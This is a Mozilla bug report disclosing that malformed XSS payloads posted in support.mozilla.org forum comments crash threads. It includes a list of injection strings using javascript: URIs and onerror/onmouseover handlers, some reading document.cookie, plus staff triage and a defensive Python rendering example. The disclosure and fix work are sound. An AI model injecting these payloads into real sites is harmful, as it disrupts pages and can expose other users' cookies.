Malformed injected <IMG> tag Crashes Forums Topic and questions on support.mozilla.org
Categories: support.mozilla.org :: General, defect
Tracking: Not tracked
People: Reporter: alisyarief.404, Unassigned
Details: Keywords: reporter-external, wsec-dos; Whiteboard: [reporter-external] [web-bounty-form] [verif?]
Attachments: 1 file (914 bytes, text/plain)
Payload XSS (minor) to Crash Forums Topic
- Log in to the website https://support.mozilla.org/
- Go to https://support.mozilla.org/id/forums/
- Comment on a Thread Topic with the payload below
javascript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
\<a onmouseover="alert(document.cookie)">xxs link\</a>
\<a onmouseover=alert(document.cookie)>xxs link\</a>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav
ascript:alert('XSS');">
- After commenting on the forum topic, the forum thread crashes and shows the alert:
An Error Occurred
Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.
- This is not a Denial-of-service attack or Rate Limit, because this payload impacts only users of support.mozilla.org
Impact:
This is dangerous!!! because all Thread Topics on the Forum crash and show Error Occurred, and users cannot access the thread.
Supporting Material/References:
Because the proof of concept video file is too big, I uploaded it to YouTube and the setting is not public:
Thanks
After my research, the XSS payload to crash Forum Topics:
<IMG SRC="jav ascript:alert('XSS');">
Thanks
Comment 3•4 years ago
Hello Kang,
Thank you for your report.
I can confirm that posting the XSS payload in the comment on a question or forum results in denial of service for the question or forum thread.
The payload that worked for me was <IMG SRC="jav
ascript:alert('XSS');">
Thanks,
Frida
(In reply to Frida Kiriakos [:frida] from comment #3)
> Hello Kang,
> Thank you for your report.
> I can confirm that posting the XSS payload in the comment on a question or forum results in denial of service for the question or forum thread.
> The payload that worked for me was
> <IMG SRC="jav
> ascript:alert('XSS');">
> Thanks,
> Frida
Hi Frida, this finding is not denial of service but Malformed injected
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users.
This is not DoS but injected code to crash the menu, because this sends 1 payload, not distributed
Thanks
Comment 5•4 years ago
We consider this bug as Denial of Service since the payload we use in the comments is causing an error on the server side which results in denying access to the topic or question for other users. DoS attack is indeed an attack on the machine or network to make it inaccessible to users and also it includes interruption to an application by exploiting an issue in the application, https://owasp.org/www-community/attacks/Denial_of_Service.
Comment 7•4 years ago
Of course, the team have already worked on the fix in bug 1762414 and we will let you know when this is deployed so we can verify the fix.
Thanks,
Frida
Comment 8•4 years ago
This is a duplicate of bug 1762414 which has been fixed in prod
Comment 9•4 years ago
We will consider the bounty award in the duplicate bug; this turned out to be a symptom of the same parser bug.
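
A defensive pattern for the failure discussed in this bug, where one stored comment that the renderer cannot parse makes the whole thread return an error page. This is an added example, not code from the report or from the fix in bug 1762414: `FragileRenderer` is a hypothetical stand-in for the site's content renderer, and `render_post`, `accept_post` and `render_thread` are assumed names.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the payload confirmed in comment 3 (newline inside the SRC value).
PAYLOAD = "<IMG SRC=\"jav\nascript:alert('XSS');\">"

class FragileRenderer(HTMLParser):
    """Hypothetical stand-in for the forum's content renderer. It keeps text,
    drops tags, and raises on an attribute value containing a control
    character, simulating an unhandled parser error."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and any(ord(ch) < 0x20 for ch in value):
                raise ValueError(f"unparseable <{tag}> attribute {name!r}")

    def handle_data(self, data):
        self.out.append(html.escape(data))

def render_post(raw):
    """Render one post; may raise, like the buggy parser did."""
    r = FragileRenderer()
    r.feed(raw)
    r.close()
    return "".join(r.out)

def accept_post(raw):
    """Submission-time check: refuse content the renderer cannot process."""
    try:
        render_post(raw)
        return True
    except Exception:
        return False

def render_thread(posts):
    """Render each post in isolation so one bad post cannot fail the page."""
    rendered, failed = [], []
    for i, raw in enumerate(posts):
        try:
            rendered.append(render_post(raw))
        except Exception:
            failed.append(i)                   # log or alert on these indexes
            rendered.append(html.escape(raw))  # inert, fully escaped fallback
    return rendered, failed
```

The submission-time check keeps unrenderable content out of storage, and the per-post isolation covers content that was stored before the check existed.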